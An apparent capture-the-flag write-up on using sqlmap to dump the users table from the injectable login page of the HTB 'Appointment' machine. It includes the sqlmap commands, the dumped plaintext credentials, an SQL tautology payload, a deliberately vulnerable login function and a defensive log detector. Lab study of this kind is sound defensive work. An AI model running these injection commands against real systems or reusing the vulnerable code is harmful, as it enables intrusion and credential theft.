Getting more data with sqlmap
The HTB Starting Point machine "Appointment" is a simple web app whose login page is vulnerable to SQL injection (login bypass).
We can confirm this by trying an SQL injection payload against the login page to bypass it and get the flag.
--
So I wanted to see how well sqlmap can pull "more" data out of the vulnerable login page.
As background, I don't know:
As a first step, I ran this command:
$ python3 sqlmap.py -u 'http://10.129.11.144/' --data="username=admin&password=admin" -a
It stopped without any significant findings, but it did identify the database type used by the web app.
So I re-ran it with one more parameter, "--dbms=mysql":
$ python3 sqlmap.py -u 'http://10.129.11.144/' --data="username=admin&password=admin" -a --dbms=mysql
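From the defender's side, a run like the two commands above leaves a recognisable trace in the web server's access log: sqlmap announces itself in its default User-Agent string, and even a client that hides that string produces a burst of POST requests to the same login path from one address. The following detector is an added example, not code from the original post or from sqlmap; the log lines are constructed in Apache "combined" format, and the IPs, timestamps and the "sqlmap/1.8" version token are made up.

```python
"""Flag sqlmap-style probing of a login form in web-server access logs.

Added example, not from the original post. Log lines are constructed in
Apache "combined" format with made-up addresses and timestamps. Two
signals are checked: a User-Agent containing "sqlmap" (the tool's default
UA has the general form "sqlmap/<version> (https://sqlmap.org)") and a
burst of POST requests to one path from one client inside a time window.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
SQLMAP_UA = "sqlmap/1.8 (https://sqlmap.org)"  # constructed; version token is made up


def _line(ip, ts, method, path, ua, status=200):
    """Render one constructed access-log line in combined format."""
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} 1234 "-" "{ua}"'


def build_sample_log():
    """Constructed log: one normal visitor, one self-identifying scanner,
    one scanner with a browser-like UA that hammers the login path."""
    t0 = datetime(2024, 3, 10, 12, 0, 0, tzinfo=timezone.utc)
    lines = [
        _line("198.51.100.7", t0, "GET", "/", BROWSER_UA),
        _line("198.51.100.7", t0 + timedelta(seconds=5), "POST", "/", BROWSER_UA),
    ]
    for i in range(3):  # three probes with the default sqlmap User-Agent
        lines.append(_line("203.0.113.9", t0 + timedelta(seconds=60 + i), "POST", "/", SQLMAP_UA))
    for i in range(25):  # 25 POSTs to the login path in 25 seconds, browser UA
        lines.append(_line("192.0.2.44", t0 + timedelta(seconds=120 + i), "POST", "/", BROWSER_UA))
    return lines


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect(lines, burst_threshold=20, window_seconds=60):
    """Return (signal, ip, path) alerts for sqlmap UAs and POST bursts."""
    alerts = []
    ua_flagged = set()
    posts = defaultdict(list)  # (ip, path) -> list of timestamps
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; skip rather than crash the pipeline
        if "sqlmap" in rec["ua"].lower() and rec["ip"] not in ua_flagged:
            ua_flagged.add(rec["ip"])
            alerts.append(("sqlmap-user-agent", rec["ip"], rec["path"]))
        if rec["method"] == "POST":
            posts[(rec["ip"], rec["path"])].append(rec["ts"])
    # Sliding window over each client's POSTs to one path.
    for (ip, path), stamps in posts.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= burst_threshold:
                alerts.append(("post-burst", ip, path))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(build_sample_log()):
        print(alert)
```

The User-Agent check is cheap but trivially evaded, so the burst rule carries most of the weight; tune `burst_threshold` and `window_seconds` to the normal login rate of the application before alerting on it.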
I got more interesting data:
Database: appdb
Table: users
[2 entries]
+----+---------------------------------------------------+----------+
| id | password                                          | username |
+----+---------------------------------------------------+----------+
| 1  | 328ufsdhjfu2hfnjsekh3rihjfcn23KDFmfesd239"23m^jdf | admin    |
| 2  | bababa                                            | test     |
+----+---------------------------------------------------+----------+
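The dump shows two things a defender should take from this machine: the login query can be steered by user input, and the `password` column holds the credentials themselves rather than hashes, so an enumeration like the one above hands them over directly. The following is an added example, not code from the original post or from the HTB machine (whose MySQL-backed source is not shown on the page). It uses an in-memory SQLite database with constructed users to put a vulnerable login check beside a hardened one: string-formatted SQL with a plaintext password column versus a parameterized query with a salted PBKDF2 hash. The classic textbook tautology input is used only to show that the hardened version treats it as literal data.

```python
"""Vulnerable login check beside a hardened one (added example).

Not code from the original post or the target app. Uses an in-memory
SQLite database with constructed users. The vulnerable version splices
input into the SQL text and compares a plaintext password column; the
hardened version binds parameters and verifies a salted PBKDF2 hash, so a
dumped table no longer yields usable credentials.
"""
import hashlib
import hmac
import os
import sqlite3

# Textbook tautology; used here only to show how each version treats it.
TAUTOLOGY = "' OR '1'='1"
PBKDF2_ITERATIONS = 100_000


def hash_password(password, salt):
    """Salted PBKDF2-HMAC-SHA256 of the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def setup_db():
    """Create both table layouts and load two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)"
    )
    conn.execute(
        "CREATE TABLE users_hashed (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
        "salt BLOB, pw_hash BLOB)"
    )
    for name, pw in [("admin", "constructed-admin-pw"), ("test", "bababa")]:
        conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (name, pw))
        salt = os.urandom(16)  # per-user random salt
        conn.execute(
            "INSERT INTO users_hashed (username, salt, pw_hash) VALUES (?, ?, ?)",
            (name, salt, hash_password(pw, salt)),
        )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """BAD: user input becomes part of the SQL text, so quotes in the input
    change the meaning of the WHERE clause. Also compares plaintext."""
    query = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_hardened(conn, username, password):
    """GOOD: the placeholder keeps the username as data, the statement text
    never changes, and the password is verified against a salted hash in
    constant time."""
    row = conn.execute(
        "SELECT salt, pw_hash FROM users_hashed WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(hash_password(password, salt), stored)


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, valid creds:", login_vulnerable(db, "test", "bababa"))
    print("vulnerable, tautology:  ", login_vulnerable(db, "admin", TAUTOLOGY))
    print("hardened, valid creds:  ", login_hardened(db, "test", "bababa"))
    print("hardened, tautology:    ", login_hardened(db, "admin", TAUTOLOGY))
```

Parameter binding alone closes the injection; the hashed column is the second half of the fix, because it limits what an enumeration reveals even if some other query in the app is still injectable.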
--
Next step: perhaps try to spawn a shell :)